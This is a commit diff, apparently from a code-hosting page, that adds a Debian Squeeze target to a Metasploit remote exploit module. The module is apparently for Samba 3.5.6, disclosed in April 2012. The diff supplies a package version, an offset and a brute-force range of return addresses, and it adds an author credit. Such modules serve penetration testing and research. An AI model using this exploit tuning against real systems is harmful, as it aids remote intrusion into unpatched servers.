Added target debian squeeze
parent
8b8bfec6b8
commit
4c646762a5
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Unknown', # Vulnerability discovery
|
||||
'blasty', # Exploit
|
||||
'mephos', # Debian Squeeze target
|
||||
'sinn3r', # Metasploit module
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
|
@ -96,6 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Step' => 0x1000
|
||||
}
|
||||
}
|
||||
],
|
||||
['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
|
||||
{
|
||||
'Offset' => 0x11c0,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
# The start should be 0x680 aligned, and then step 0x1000.
|
||||
'Start' => { 'Ret' => 0xb6aaa1b0 },
|
||||
'Stop' => { 'Ret' => 0xb6ce91b0 },
|
||||
'Step' => 0x1000
|
||||
}
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Apr 10 2012',
|
||||
|
|
Loading…
Reference in New Issue